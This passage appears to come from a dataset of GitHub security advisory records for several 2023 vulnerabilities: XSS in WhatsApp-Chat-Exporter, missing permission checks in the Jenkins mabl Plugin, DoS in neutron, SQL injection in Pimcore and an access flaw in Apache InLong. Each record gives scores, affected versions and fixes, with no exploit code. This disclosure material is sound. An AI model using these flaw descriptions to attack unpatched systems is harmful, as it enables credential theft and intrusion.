A Cross-Site Scripting (XSS) vulnerability was found in the HTML output of chats. XSS is intended to be mitigated by Jinja's escape function. However, `autoescape=True` was missing when setting the environment. Although the actual impact is low, considering the HTML file is being viewed offline, an adversary may still be able to inject malicious payloads into the chat through WhatsApp. All users are affected.
### Patches
The vulnerability is patched in 0.9.5. All users are strongly advised to update the exporter to the latest version.
### Workarounds
No workaround is available. Please update the exporter to the latest version.
### References
https://github.com/KnugiHK/WhatsApp-Chat-Exporter/commit/bfdc68cd6ad53ceecf132773f9aaba50dd80fe79
https://owasp.org/www-community/attacks/xss/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'Whatsapp-Chat-Exporter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/KnugiHK/WhatsApp-Chat-Exporter/security/advisories/GHSA-8c6x-g4fw-8rf4'}, {'type': 'WEB', 'url': 'https://github.com/KnugiHK/WhatsApp-Chat-Exporter/commit/bfdc68cd6ad53ceecf132773f9aaba50dd80fe79'}, {'type': 'PACKAGE', 'url': 'https://github.com/KnugiHK/WhatsApp-Chat-Exporter'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T21:54:36Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-m9jj-p947-m8xv
|
2023-07-20T14:07:26Z
|
2023-07-12T18:30:38Z
| null |
['CVE-2023-37953']
|
Jenkins mabl Plugin missing permission check
|
Jenkins mabl Plugin 0.0.46 and earlier does not perform permission checks in several HTTP endpoints.
This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
mabl Plugin 0.0.47 requires POST requests and the appropriate permissions for the affected HTTP endpoints.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.mabl.integration.jenkins:mabl-integration'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.47'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37953'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3127'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:31:45Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-r3jh-qhgj-gvr8
|
2023-07-31T18:59:51Z
|
2023-07-25T15:30:25Z
| null |
['CVE-2023-3637']
|
Denial of service in neutron
|
An uncontrolled resource consumption flaw was found in openstack-neutron. This flaw allows a remote authenticated user to query a list of security groups for an invalid project. This issue creates resources that are unconstrained by the user's quota. If a malicious user were to submit a significant number of requests, this could lead to a denial of service.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'neutron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '22.0.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3637'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:4283'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-3637'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2222270'}]
|
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T19:24:57Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-rxp5-qwrf-pfv3
|
2023-07-14T21:50:15Z
|
2023-07-14T15:30:26Z
| null |
['CVE-2023-3673']
|
Pimcore SQL Injection vulnerability
|
SQL Injection in GitHub repository pimcore/pimcore prior to 10.5.24.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.24'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3673'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/a06ce0abdba19ae0eefc38b035e677f8f0c2bce9'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/46ca0934-5260-477b-9e86-7b16bb18d0a9'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:50:15Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-3p9p-59qf-mqwh
|
2023-07-06T23:27:00Z
|
2023-07-06T21:14:59Z
| null |
['CVE-2023-31064']
|
Apache InLong has Files or Directories Accessible to External Parties
|
Files or Directories Accessible to External Parties vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong from 1.2.0 through 1.6.0.The user in InLong could cancel an application that doesn't belong to it. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7799 to solve it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-workflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31064'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7799'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/1osd2k3t3qol2wdsswqtr9gxdkf78n00'}]
|
{'cwe_ids': ['CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:27:00Z', 'nvd_published_at': None}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.